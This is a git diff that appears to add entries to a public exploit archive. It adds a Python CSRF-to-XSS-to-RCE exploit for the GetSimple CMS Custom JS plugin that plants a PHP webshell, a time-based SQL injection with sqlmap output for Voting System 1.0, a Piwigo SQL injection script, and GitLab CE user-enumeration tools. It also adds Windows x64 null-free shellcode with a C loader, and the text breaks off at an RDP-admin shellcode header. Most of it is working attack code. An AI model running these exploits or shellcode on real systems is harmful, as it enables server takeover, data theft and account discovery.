diff --git a/exploits/php/webapps/49816.py b/exploits/php/webapps/49816.py new file mode 100755 index 000000000..32d552fdc --- /dev/null +++ b/exploits/php/webapps/49816.py @@ -0,0 +1,166 @@ +# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE +# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi +# Date: 30/04/201 +# Vendor Homepage: http://get-simple.info +# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/ +# Vendor: 4Enzo +# Version: v0.1 +# Tested against Server Host: Windows 10 Pro + XAMPP +# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer +# Vulnerability Description: +# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website. +# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce +# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H +# CVSS Base Score: 9.6 + +import argparse,requests +from http.server import BaseHTTPRequestHandler, HTTPServer +from colorama import (Fore as F, Back as B, Style as S) +from threading import Thread +from time import sleep + +FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT +def bullet(char,color): + C=FB if color == 'B' else FR if color == 'R' else FG + return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' +info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G') + +class theTHREADER(object): + def __init__(self, interval=1): + self.interval = interval + thread = Thread(target=self.run, args=()) + thread.daemon = True + thread.start() + def run(self): + run() + +def webshell(target): + try: + websh = "{}/webshell.php".format(target,page) + term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST) + welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST) + print(welcome) + while True: + specialmove = input(term) + command = {'FierceGodKick': specialmove} + r = requests.post(websh, data=command, verify=False) + status = r.status_code + if status != 200: + r.raise_for_status() + response = r.text + print(response) + except: + pass + + +def xhrRcePayload(): + payload = 'var e=function(i){return encodeURIComponent(i);};' + payload += 'var gt = decodeURIComponent("%3c");' + payload += 'var lt = decodeURIComponent("%3e");' + payload += 'var h="application/x-www-form-urlencoded";' + payload += 'var u="/admin/theme-edit.php";' + payload += 'var xhr1=new XMLHttpRequest();' + payload += 'var xhr2=new XMLHttpRequest();' + payload += 'xhr1.onreadystatechange=function(){' + payload += 'if(xhr1.readyState==4 && xhr1.status==200){' + payload += 'r=this.responseXML;' + payload += 'nVal=r.querySelector("#nonce").value;' + payload += 'eVal=r.forms[1][2].defaultValue;' + payload += 'xhr2.open("POST",u,true);' + payload += 'xhr2.setRequestHeader("Content-Type",h);' + payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);' + payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";' + payload += 'xhr2.send(params);' + payload += '}};' + payload += 'xhr1.open("GET",u,true);' + payload += 'xhr1.responseType="document";' + payload += 'xhr1.send();' + return payload + +def csrfPayload(): + payload = '' + payload += '
' + payload += '' + payload += '' + payload += '' + payload += '' + payload += '
' + return payload + +class S(BaseHTTPRequestHandler): + def do_GET(self): + victim = self.client_address + victim = "{}:{}".format(victim[0],victim[1]) + print("{}{} connected to Malicious CSRF Site!".format(ok,victim)) + print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info)) + self.wfile.write("{}".format(csrfPayload()).encode('utf-8')) + +def run(server_class=HTTPServer, handler_class=S, port=80): + server_address = ('', port) + httpd = server_class(server_address, handler_class) + print('{}Hosting CSRF attack & listening for admin to connect..'.format(info)) + try: + httpd.serve_forever() + except KeyboardInterrupt: + pass + httpd.server_close() + print('Stopping httpd...') + +def tryUploadWebshell(target,page): + try: + blind = target+page + # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt) + webshUpload = {'solarflare': "echo ^>webshell.php"} + requests.post(url=blind, data=webshUpload, verify=False) + except: + pass + +def checkWebshell(target): + try: + websh = "{}/webshell.php".format(target) + capsule = {'FierceGodKick':'pwnt?'} + resp = requests.post(url=websh, data=capsule, verify=False) + return resp.status_code + except: + pass + +def sig(): + SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n" + SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n" + SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n" + SIG += FY+" | ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n" + SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n" + SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST + return SIG + +def argsetup(): + about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST + about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC + parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter) + desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB + parser.add_argument('Target',type=str,help=desc1) + desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST + parser.add_argument('PublicPage',type=str,help=desc2) + args = parser.parse_args() + return args + +if __name__ == '__main__': + header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n' + header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST + header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST + print(header) + args = argsetup() + target = args.Target + page = args.PublicPage + print(sig()) + theTHREADER() + pwnt = checkWebshell(target) + if pwnt != 200: + while pwnt != 200: + sleep(3) + tryUploadWebshell(target,page) + sleep(2) + pwnt = checkWebshell(target) + print("{} A wild webshell appears!".format(ok)) + webshell(target) \ No newline at end of file diff --git a/exploits/php/webapps/49817.txt b/exploits/php/webapps/49817.txt new file mode 100644 index 000000000..0b9089ab3 --- /dev/null +++ b/exploits/php/webapps/49817.txt @@ -0,0 +1,171 @@ +# Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) +# Date: 02/05/2021 +# Exploit Author: Syed Sheeraz Ali +# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html +# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code +# Version: 1.0 +# Tested on: Windows 10 20H2 + XAMPP v3.2.4 + +If we try to login as a voter and catch the login request in burp then pass it to sql map then we can put our payload in voter parameter + +Vulnerable code + +``` + +Path :- /votersystem/login.php + + +query($sql); + + + if($query->num_rows < 1){ + + $_SESSION['error'] = 'Cannot find voter with the ID'; + + } + + else{ + + $row = $query->fetch_assoc(); + + if(password_verify($password, $row['password'])){ + + $_SESSION['voter'] = $row['id']; + + } + + else{ + + $_SESSION['error'] = 'Incorrect password'; + + } + + } + + + + } + + else{ + + $_SESSION['error'] = 'Input voter credentials first'; + + } + + + header('location: index.php'); + + +?> + +``` +Request + +``` + +POST /login.php HTTP/1.1 +Host: 10.129.139.200 +Content-Length: 27 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://10.129.139.200 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Sec-GPC: 1 +Referer: http://10.129.139.200/ +Accept-Encoding: gzip, deflate +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 +Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe +Connection: close + +voter=as&password=as&login= + +``` +Sqlmap output + +``` + +python3 sqlmap.py --dbms=mysql --batch --level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter + + ___ + + __H__ + + ___ ___[)]_____ ___ ___ {1.5.4.7#dev} + +|_ -| . [(] | .'| . | + +|___|_ ["]_|_|_|__,| _| + + |_|V... |_| http://sqlmap.org + + +[!] legal disclaimer: Usage of sqlmap for attacking targets without prior +mutual consent is illegal. It is the end user's responsibility to obey all +applicable local, state and federal laws. Developers assume no liability +and are not responsible for any misuse or damage caused by this program + + +[*] starting @ 07:50:56 /2021-05-02/ + + +[07:50:56] [INFO] parsing HTTP request from +'/Users/sheerazali/Documents/wpcve/voter.req' + +[07:50:57] [INFO] testing connection to the target URL + +got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y + +redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y + +sqlmap resumed the following injection point(s) from stored session: + +--- + +Parameter: voter (POST) + + Type: time-based blind + + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + + Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login= + +--- + +[07:50:57] [INFO] testing MySQL + +do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y + +[07:51:08] [INFO] confirming MySQL +[07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions +[07:51:19] [INFO] adjusting time delay to 1 second due to good response times +[07:51:19] [INFO] the back-end DBMS is MySQL + +web application technology: PHP 7.3.27, Apache 2.4.46 + +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) + +[07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200' + + +[*] ending @ 07:51:19 /2021-05-02/ + +``` \ No newline at end of file diff --git a/exploits/php/webapps/49818.py b/exploits/php/webapps/49818.py new file mode 100755 index 000000000..4fac794c7 --- /dev/null +++ b/exploits/php/webapps/49818.py @@ -0,0 +1,60 @@ +# Exploit Title: Piwigo 11.3.0 - 'language' SQL +# Author: @nu11secur1ty +# Testing and Debugging: nu11secur1ty +# Date: 04.30.2021 +# Vendor: https://piwigo.org/ +# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0 +# CVE: CVE-2021-27973 + +[+] Exploit Source: + +#!/usr/bin/python3 +# Author: @nu11secur1ty +# Debug: @nu11secur1ty +# CVE-2021-27973 + +from selenium import webdriver +import time + + +#enter the link to the website you want to automate login. +website_link="http://192.168.1.3/piwigo/" + +#enter your login username +username="admin" + +#enter your login password +password="password" + +#enter the element for username input field +element_for_username="username" + +#enter the element for password input field +element_for_password="password" + +#enter the element for submit button +element_for_submit="login" + +print("Loading... ;)") +time.sleep(1) +browser = webdriver.Chrome() +browser.get((website_link)) + +try: +username_element = browser.find_element_by_name(element_for_username) +username_element.send_keys(username) +password_element = browser.find_element_by_name(element_for_password) +password_element.send_keys(password) +signInButton = browser.find_element_by_name(element_for_submit) +signInButton.click() + +# Languages Exploit +time.sleep(5) +browser.get((" +http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate")) + +print("The payload for category Languages is deployed...\n") + +except Exception: +#### This exception occurs if the element are not found in the webpage. +print("Some error occured :(") \ No newline at end of file diff --git a/exploits/ruby/webapps/49821.sh b/exploits/ruby/webapps/49821.sh new file mode 100755 index 000000000..c4af50ff2 --- /dev/null +++ b/exploits/ruby/webapps/49821.sh @@ -0,0 +1,111 @@ +# Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration +# Date: 4/29/2021 +# Exploit Author: @4D0niiS [https://github.com/4D0niiS] +# Vendor Homepage: https://gitlab.com/ +# Version: 13.10.3 +# Tested on: Kali Linux 2021.1 + +#!/bin/bash + +#Colors +RED='\033[38;5;196m' +GREEN='\e[38;5;47m' +NC='\033[0m' +BOLD='\e[1m' +PINK='\e[38;5;198m' +Italic='\e[3m' +BBlue='\e[44m' +YELLOW='\033[0;33m' + +clear +echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" +echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}" +echo -e " ${BOLD}Version 1.0${NC}\n" +echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n" +echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only" +echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the" +echo -e "right permission is totally on your own risk.\n${NC}" +echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}" +echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" +echo "" +echo "" + + + +# Usage +usage() { +echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url --userlist ${NC}\n" + +echo -e "${Italic}PARAMETERS:${NC}" +echo -e "-------------" +echo -e "-u/--url The URL of your victim's GitLab instance" +echo -e "--userlist Path to a username wordlist file (one per line)" +echo -e "-h/--help Show this help message and exit" +echo -e "\n" +echo -e "${Italic}Example:${NC}" +echo -e "-------------" +echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt" +} + +#check for params +args=("$@") +URL="" +user_list="" + +for (( i=0; i < $#; i++)) +{ + case ${args[$i]} in + --url | -u) + #GitLab's URL + URL=${args[$((i+1))]} + ;; + --userlist) + #Username wordlist + user_list=${args[$((i+1))]} + ;; + -h | --help | "") + #Help Menu + usage + exit 0 + ;; + esac +} + + +## checking the mandatory parameter (URL) +if [ -z "$URL" ] +then + usage + echo "" + echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}" + exit 0 +fi + + +# User Enumeration Function +enumeration(){ + +while IFS= read -r line +do + echo "LOOP" + HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line) + echo $HTTP_Code + #echo "\n" + if [ $HTTP_Code -eq 200 ] + then + echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!" + #check the connection + elif [ $HTTP_Code -eq 000 ] + then + echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!" + exit 0 + fi + +done < "$user_list" + +} + + + +# Main +enumeration \ No newline at end of file diff --git a/exploits/ruby/webapps/49822.rb b/exploits/ruby/webapps/49822.rb new file mode 100755 index 000000000..a752145ac --- /dev/null +++ b/exploits/ruby/webapps/49822.rb @@ -0,0 +1,82 @@ +# Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration +# Date: 4/29/2021 +# Exploit Author: @4D0niiS [https://github.com/4D0niiS] +# Vendor Homepage: https://gitlab.com/ +# Version: 13.10.3 +# Tested on: Kali Linux 2021.1 + +INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sgin_up]. + +DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purpose and ethical use. Testing it against systems that you do not own or have the right permission is totally on your own risk. + +STEPS: The required steps for this purpose are as follows: + +1- fill in the "username" field on sign_up form with something and ensure it is validating the entered username +2- repeat step1 (with username: testuser) while you are intercepting the created request with a proxy tool like Burp Suite. You should see a request similar to the one bellow: +---------------------------------------------------------------------------------------------------------------------------------------------------------------- +GET /users/testuser/exists HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 +Accept: application/json, text/plain, / +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/users/sign_up +X-CSRF-Token: +X-Requested-With: XMLHttpRequest +Connection: close +Cookie: experimentation_subject_id=; known_sign_in=; _gitlab_session= +---------------------------------------------------------------------------------------------------------------------------------------------------------------- +* note that the tested username (testuser) is in URI + +3- Send this request to Burp's intruder and run a brute force attack on it by replacing "testuser" in the URI as the enumeration parameter. +4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples: + +-------------------------------------------The following response belongs to a valid user ------------------------------------------ +HTTP/1.1 200 OK +Server: nginx +Date: Mon, 19 Apr 2021 09:52:44 GMT +Content-Type: application/json; charset=utf-8 +Content-Length: 15 +Connection: close +Cache-Control: max-age=0, private, must-revalidate +Etag: W/"8063e5a51719c58189c7d5209a5f37b3" +Page-Title: GitLab +Set-Cookie: _gitlab_session=; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly +X-Content-Type-Options: nosniff +X-Download-Options: noopen +X-Frame-Options: DENY +X-Gitlab-Feature-Category: users +X-Permitted-Cross-Domain-Policies: none +X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F +X-Runtime: 0.221557 +X-Ua-Compatible: IE=edge +X-Xss-Protection: 1; mode=block +Strict-Transport-Security: max-age=31536000 +Referrer-Policy: strict-origin-when-cross-origin + +{"exists":true} + +-------------------------------------------The following response belongs to an invalid user ------------------------------------------ +HTTP/1.1 200 OK +Server: nginx +Date: Mon, 19 Apr 2021 09:55:34 GMT +Content-Type: application/json; charset=utf-8 +Content-Length: 16 +Connection: close +Cache-Control: max-age=0, private, must-revalidate +Etag: W/"e39f603a5ebcff23859d200f9c9dc20f" +Page-Title: GitLab +Set-Cookie: _gitlab_session=; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly +X-Content-Type-Options: nosniff +X-Download-Options: noopen +X-Frame-Options: DENY +X-Gitlab-Feature-Category: users +X-Permitted-Cross-Domain-Policies: none +X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0 +X-Runtime: 0.033046 +X-Ua-Compatible: IE=edge +X-Xss-Protection: 1; mode=block +Strict-Transport-Security: max-age=31536000 +Referrer-Policy: strict-origin-when-cross-origin + +{"exists":false} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1baf008cc..22a3745e5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43985,3 +43985,8 @@ id,file,description,date,author,type,platform,port 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php, 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple, 49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php, +49816,exploits/php/webapps/49816.py,"GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE",2021-05-03,boku,webapps,php, +49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",2021-05-03,"Syed Sheeraz Ali",webapps,php, +49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php, +49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby, +49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 32307fc3b..048f260c0 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1034,3 +1034,5 @@ id,file,description,date,author,type,platform 49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86 49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86 49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64 +49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",2021-05-03,boku,shellcode,windows_x86-64 +49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64 diff --git a/shellcodes/windows_x86-64/49819.c b/shellcodes/windows_x86-64/49819.c new file mode 100644 index 000000000..af94e8700 --- /dev/null +++ b/shellcodes/windows_x86-64/49819.c @@ -0,0 +1,133 @@ +# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) +# Shellcode Author: Bobby Cooke (boku) +# Date: 02/05/2021 +# Tested on: Windows 10 v2004 (x64) +# Shellcode Description: +# 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method. +# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities. +# Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads. + +; Compile & get shellcode from Kali: +; nasm -f win64 popcalc.asm -o popcalc.o +; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done +; Get kernel32.dll base address +xor rdi, rdi ; RDI = 0x0 +mul rdi ; RAX&RDX =0x0 +mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB +mov rbx, [rbx+0x18] ; RBX = Address_of_LDR +mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll +mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll +mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll +mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll) +mov r8, rbx ; RBX & R8 = &kernel32.dll + +; Get kernel32.dll ExportTable Address +mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader +add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader +xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add +add cx, 0x88ff +shr rcx, 0x8 ; RCX = 0x88ff --> 0x88 +mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable +add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable + +; Get &AddressTable from Kernel32.dll ExportTable +xor r10, r10 +mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable +add r10, r8 ; R10 = &AddressTable + +; Get &NamePointerTable from Kernel32.dll ExportTable +xor r11, r11 +mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable +add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable) + +; Get &OrdinalTable from Kernel32.dll ExportTable +xor r12, r12 +mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable +add r12, r8 ; R12 = &OrdinalTable + +jmp short apis + +; Get the address of the API from the Kernel32.dll ExportTable +getapiaddr: +pop rbx ; save the return address for ret 2 caller after API address is found +pop rcx ; Get the string length counter from stack +xor rax, rax ; Setup Counter for resolving the API Address after finding the name string +mov rdx, rsp ; RDX = Address of API Name String to match on the Stack +push rcx ; push the string length counter to stack +loop: +mov rcx, [rsp] ; reset the string length counter from the stack +xor rdi,rdi ; Clear RDI for setting up string name retrieval +mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] +add rdi, r8 ; RDI = &NameString = RVA NameString + &kernel32.dll +mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string) +repe cmpsb ; Compare strings at RDI & RSI +je resolveaddr ; If match then we found the API string. Now we need to find the Address of the API +incloop: +inc rax +jmp short loop + +; Find the address of GetProcAddress by using the last value of the Counter +resolveaddr: +pop rcx ; remove string length counter from top of stack +mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of kernel32. +mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber] +add rax, r8 ; RAX = Kernel32. = RVA kernel32. + kernel32.dll BaseAddress +push rbx ; place the return address from the api string call back on the top of the stack +ret ; return to API caller + +apis: ; API Names to resolve addresses +; WinExec | String length : 7 +xor rcx, rcx +add cl, 0x7 ; String length for compare string +mov rax, 0x9C9A87BA9196A80F ; not 0x9C9A87BA9196A80F = 0xF0,WinExec +not rax ;mov rax, 0x636578456e6957F0 ; cexEniW,0xF0 : 636578456e6957F0 - Did Not to avoid WinExec returning from strings static analysis +shr rax, 0x8 ; xEcoll,0xFFFF --> 0x0000,xEcoll +push rax +push rcx ; push the string length counter to stack +call getapiaddr ; Get the address of the API from Kernel32.dll ExportTable +mov r14, rax ; R14 = Kernel32.WinExec Address + +; UINT WinExec( +; LPCSTR lpCmdLine, => RCX = "calc.exe",0x0 +; UINT uCmdShow => RDX = 0x1 = SW_SHOWNORMAL +; ); +xor rcx, rcx +mul rcx ; RAX & RDX & RCX = 0x0 +; calc.exe | String length : 8 +push rax ; Null terminate string on stack +mov rax, 0x9A879AD19C939E9C ; not 0x9A879AD19C939E9C = "calc.exe" +not rax +;mov rax, 0x6578652e636c6163 ; exe.clac : 6578652e636c6163 +push rax ; RSP = "calc.exe",0x0 +mov rcx, rsp ; RCX = "calc.exe",0x0 +inc rdx ; RDX = 0x1 = SW_SHOWNORMAL +sub rsp, 0x20 ; WinExec clobbers first 0x20 bytes of stack (Overwrites our command string when proxied to CreatProcessA) +call r14 ; Call WinExec("calc.exe", SW_HIDE) + + +########################################################################################################################################### + +// runShellcode.c +// C Shellcode Run Code referenced from reenz0h (twitter: @sektor7net) +#include +void main() { + void* exec; + BOOL rv; + HANDLE th; + DWORD oldprotect = 0; + // Shellcode + unsigned char payload[] = + "\x48\x31\xff\x48\xf7\xe7\x65\x48\x8b\x58\x60\x48\x8b\x5b\x18\x48\x8b\x5b\x20\x48\x8b\x1b\x48\x8b\x1b\x48\x8b\x5b\x20\x49\x89\xd8\x8b" + "\x5b\x3c\x4c\x01\xc3\x48\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x4d\x31\xd2\x44\x8b\x52\x1c\x4d\x01\xc2" + "\x4d\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4d\x31\xe4\x44\x8b\x62\x24\x4d\x01\xc4\xeb\x32\x5b\x59\x48\x31\xc0\x48\x89\xe2\x51\x48\x8b" + "\x0c\x24\x48\x31\xff\x41\x8b\x3c\x83\x4c\x01\xc7\x48\x89\xd6\xf3\xa6\x74\x05\x48\xff\xc0\xeb\xe6\x59\x66\x41\x8b\x04\x44\x41\x8b\x04" + "\x82\x4c\x01\xc0\x53\xc3\x48\x31\xc9\x80\xc1\x07\x48\xb8\x0f\xa8\x96\x91\xba\x87\x9a\x9c\x48\xf7\xd0\x48\xc1\xe8\x08\x50\x51\xe8\xb0" + "\xff\xff\xff\x49\x89\xc6\x48\x31\xc9\x48\xf7\xe1\x50\x48\xb8\x9c\x9e\x93\x9c\xd1\x9a\x87\x9a\x48\xf7\xd0\x50\x48\x89\xe1\x48\xff\xc2" + "\x48\x83\xec\x20\x41\xff\xd6"; + unsigned int payload_len = 205; + exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + RtlMoveMemory(exec, payload, payload_len); + rv = VirtualProtect(exec, payload_len, PAGE_EXECUTE_READ, &oldprotect); + th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0); + WaitForSingleObject(th, -1); +} \ No newline at end of file diff --git a/shellcodes/windows_x86-64/49820.c b/shellcodes/windows_x86-64/49820.c new file mode 100644 index 000000000..28bddb1f2 --- /dev/null +++ b/shellcodes/windows_x86-64/49820.c @@ -0,0 +1,193 @@ +# Shellcode Title: Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 